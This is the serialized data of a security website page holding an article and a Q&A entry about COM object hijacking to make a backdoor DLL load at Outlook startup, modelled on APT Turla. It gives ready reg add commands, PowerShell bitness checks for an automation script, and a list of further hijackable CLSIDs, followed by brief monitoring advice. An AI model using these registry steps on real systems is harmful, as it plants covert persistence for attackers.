[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5ToOugcYJpB1p4PeyE2fTEv3wPB_fQbOxV8CIsE2kfw":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":30,"aiConfidence":30,"updatedAt":51,"createdAt":51,"_status":50},29,"How does the registry modification work for hijacking Outlook’s COM objects?","The attack sets a `TreatAs` value for the first COM object (CLSID `{84DA0A92-...}`) to redirect calls to a second COM object (CLSID `{49CBB1C7-...}`). The second object's `InprocServer32` key points to the attacker’s DLL, with a `ThreadingModel` of `Apartment`. Similar techniques are used in other COM hijacking scenarios, such as [Hijack CAccPropServicesClass and MMDeviceEnumerator](\u002Fnews\u002Fuse-com-object-hijacking-to-maintain-persistence-hijack-caccpropservicesclass-and-mmdeviceenumerator) and [Hijack explorer.exe](\u002Fnews\u002Fuse-com-object-hijacking-to-maintain-persistence-hijack-explorer-exe).","\u003Cp>The attack sets a `TreatAs` value for the first COM object (CLSID `{84DA0A92-...}`) to redirect calls to a second COM object (CLSID `{49CBB1C7-...}`). The second object&#39;s `InprocServer32` key points to the attacker’s DLL, with a `ThreadingModel` of `Apartment`. Similar techniques are used in other COM hijacking scenarios, such as [Hijack CAccPropServicesClass and MMDeviceEnumerator](\u002Fnews\u002Fuse-com-object-hijacking-to-maintain-persistence-hijack-caccpropservicesclass-and-mmdeviceenumerator) and [Hijack explorer.exe](\u002Fnews\u002Fuse-com-object-hijacking-to-maintain-persistence-hijack-explorer-exe).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fuse-com-object-hijacking-to-maintain-persistence-hijack-outlook\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-does-the-registry-modification-work-for-hijacking-outlooks-com-objects-1777485476296","registry modification, TreatAs, InprocServer32, CLSID, DLL, Outlook hijacking",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":27,"cover":30,"author":31,"views":32,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":40,"qaPairs":41,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},9,"Use COM Object hijacking to maintain persistence——Hijack Outlook","use-com-object-hijacking-to-maintain-persistence-hijack-outlook","Learn how to use COM object hijacking for Outlook persistence, mimicking APT Trula's method. Includes PowerShell automation, registry tweaks, and defense tips.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>A backdoor exploitation method used by APT group Trula, which loads a DLL when Outlook starts via COM hijacking. Its characteristic is that it only requires the current user's permissions to achieve persistence.\u003C\u002Fp>\u003Cp>This article will test this method based on publicly available information, develop an automated exploitation script, explore extended usage, share multiple viable hijacking locations, and provide defense recommendations along with exploitation concepts.\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.welivesecurity.com\u002Fwp-content\u002Fuploads\u002F2018\u002F08\u002FEset-Turla-Outlook-Backdoor.pdf\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Exploitation Method\u003C\u002Fli>\u003Cli>Details of PowerShell Script Implementation\u003C\u002Fli>\u003Cli>Extended Usage\u003C\u002Fli>\u003Cli>Defense Recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Exploitation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Outlook loads multiple COM objects during startup. We can hijack Outlook's startup process by modifying the registry to load a DLL.\u003C\u002Fp>\u003Cp>This exploitation method requires adding two registry entries and modifying two COM objects.\u003C\u002Fp>\u003Cp>Since we are modifying the HKCU registry, current user privileges are sufficient.\u003C\u002Fp>\u003Ch3>(1) COM Object 1, used to load the second COM object\u003C\u002Fh3>\u003Cp>Add the following registry entry:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>HKCU\\Software\\Classes\\CLSID\\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\\TreatAs = {49CBB1C7-97D1-485A-9EC1-A26065633066}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command to implement this via command line is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKCU\\Software\\Classes\\CLSID\\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\\TreatAs \u002Ft REG_SZ \u002Fd \"{49CBB1C7-97D1-485A-9EC1-A26065633066}\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>(2) COM Object 2, used to load the DLL\u003C\u002Fh3>\u003Cp>Add the following registry entries:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>HKCU\\Software\\Classes\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066} = Mail Plugin\u003Cbr>HKCU\\Software\\Classes\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InprocServer32 = [Path to the backdoor DLL]\u003Cbr>HKCU\\Software\\Classes\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InprocServer32\\ThreadingModel = Apartment\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command to implement this via command line is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKCU\\Software\\Classes\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066} \u002Ft REG_SZ \u002Fd \"Mail Plugin\" \u002Ff\u003Cbr>reg add HKCU\\Software\\Classes\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InprocServer32 \u002Ft REG_SZ \u002Fd \"c:\\\\test\\\\calc.dll\" \u002Ff\u003Cbr>reg add HKCU\\Software\\Classes\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InprocServer32 \u002Fv ThreadingModel \u002Ft REG_SZ \u002Fd \"Apartment\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>calc.dll can use the previous test DLL, available at: an open-source project\u003C\u002Fp>\u003Cp>After adding the registry, launch Outlook, which loads the DLL multiple times and pops up multiple calculators. A mutex can be used here to ensure only one calculator pops up. DLL download address:\u003C\u002Fp>\u003Cp>an open-source project\u003C\u002Fp>\u003Cp>For 64-bit Windows systems with 32-bit Office installed, the registry location for the two COM objects needs to be modified to HKCU\\Software\\Classes\\Wow6432Node\\CLSID\\\u003C\u002Fp>\u003Ch2>0x03 PowerShell Script Implementation Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The implementation process is as follows:\u003C\u002Fp>\u003Col>\u003Cli>Determine the operating system bitness\u003C\u002Fli>\u003Cli>Determine the Office software version\u003C\u002Fli>\u003Cli>If it's a 64-bit system with 32-bit Office installed, the registry location is HKCU\\Software\\Classes\\Wow6432Node\\CLSID\\; otherwise, the registry location is HKCU\\Software\\Classes\\CLSID\\\u003C\u002Fli>\u003Cli>Add the corresponding registry entries\u003C\u002Fli>\u003C\u002Fol>\u003Cp>The specific code is as follows:\u003C\u002Fp>\u003Ch4>1. Determine the operating system bitness\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>if ([IntPtr]::Size -eq 8)\u003Cbr>{\u003Cbr>    '64-bit'\u003Cbr>}\u003Cbr>else\u003Cbr>{\u003Cbr>    '32-bit'\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Determine the installed Office software version\u003C\u002Fh4>\u003Cp>Check if the default installation path C:\\Program Files\\Microsoft Office contains the MEDIA folder\u003C\u002Fp>\u003Cp>If it contains, then it is 64-bit Office, otherwise it is 32-bit Office\u003C\u002Fp>\u003Cp>PowerShell code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Try  \u003Cbr>{  \u003Cbr>\tdir C:\\Program Files\\Microsoft Office\\MEDIA\u003Cbr>\tWrite-Host \"Microsoft Office: 64-bit\"\u003Cbr>}\u003Cbr>Catch\u003Cbr>{\u003Cbr>\tWrite-Host \"Microsoft Office: 32-bit\"\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The implementation code has been open-sourced at the following address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code automatically determines the operating system architecture and Office software version, then adds corresponding registry entries\u003C\u002Fp>\u003Ch2>0x04 Extended Usage\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Use Process Monitor to monitor the Outlook startup process and identify other available COM objects\u003C\u002Fp>\u003Cp>Testing revealed multiple available methods in Outlook 2013\u003C\u002Fp>\u003Cp>Replace COM object 1 with any of the following, while keeping COM object 2 unchanged\u003C\u002Fp>\u003Cp>Available COM object 1:\u003C\u002Fp>\u003Cul>\u003Cli>{B056521A-9B10-425E-B616-1FCD828DB3B1}\u003C\u002Fli>\u003Cli>{EFEF7FDB-0CED-4FB6-B3BB-3C50D39F4120}\u003C\u002Fli>\u003Cli>{93E5752E-B889-47C5-8545-654EE2533C64}\u003C\u002Fli>\u003Cli>{56FDF344-FD6D-11D0-958A-006097C9A090}\u003C\u002Fli>\u003Cli>{2163EB1F-3FD9-4212-A41F-81D1F933597F}\u003C\u002Fli>\u003Cli>{A6A2383F-AD50-4D52-8110-3508275E77F7}\u003C\u002Fli>\u003Cli>{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\u003C\u002Fli>\u003Cli>{88D96A05-F192-11D4-A65F-0040963251E5}\u003C\u002Fli>\u003Cli>{807583E5-5146-11D5-A672-00B0D022E945}\u003C\u002Fli>\u003Cli>{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\u003C\u002Fli>\u003Cli>{3CE74DE4-53D3-4D74-8B83-431B3828BA53}\u003C\u002Fli>\u003Cli>{A4B544A1-438D-4B41-9325-869523E2D6C7}\u003C\u002Fli>\u003Cli>{33C53A50-F456-4884-B049-85FD643ECFED}\u003C\u002Fli>\u003Cli>{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\u003C\u002Fli>\u003Cli>{275C23E2-3747-11D0-9FEA-00AA003F8646}\u003C\u002Fli>\u003Cli>{C15BB852-6F97-11D3-A990-00104B2A619F}\u003C\u002Fli>\u003Cli>{ED475410-B0D6-11D2-8C3B-00104B2A6676}\u003C\u002Fli>\u003Cli>{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\u003C\u002Fli>\u003Cli>{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\u003C\u002Fli>\u003Cli>{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x05 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Monitor creation and modification operations under the following registry keys:\u003C\u002Fp>\u003Cul>\u003Cli>HKCU\\Software\\Classes\\CLSID\\\u003C\u002Fli>\u003Cli>HKCU\\Software\\Classes\\Wow6432Node\\CLSID\\\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces a method to load a DLL during Outlook startup via COM hijacking, shares multiple available hijacking locations, and provides defense recommendations based on exploitation techniques.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",4,3,"published","2026-02-02T08:20:29.496Z",{"title":37,"description":14,"keywords":38,"ogImage":30,"canonicalUrl":30,"noIndex":39},"COM Object Hijacking for Outlook Persistence: APT Trula Method","COM hijacking, Outlook persistence, APT Trula, backdoor, DLL loading, registry exploit, PowerShell script, defense recommendations",false,[],{"docs":42,"hasNextPage":39},[43,44,45,4,46],32,31,30,28,{"title":30,"description":30,"image":30},"2026-07-24T02:07:30.777Z","2026-07-23T16:00:54.278Z","draft","2026-07-23T16:03:02.014Z"]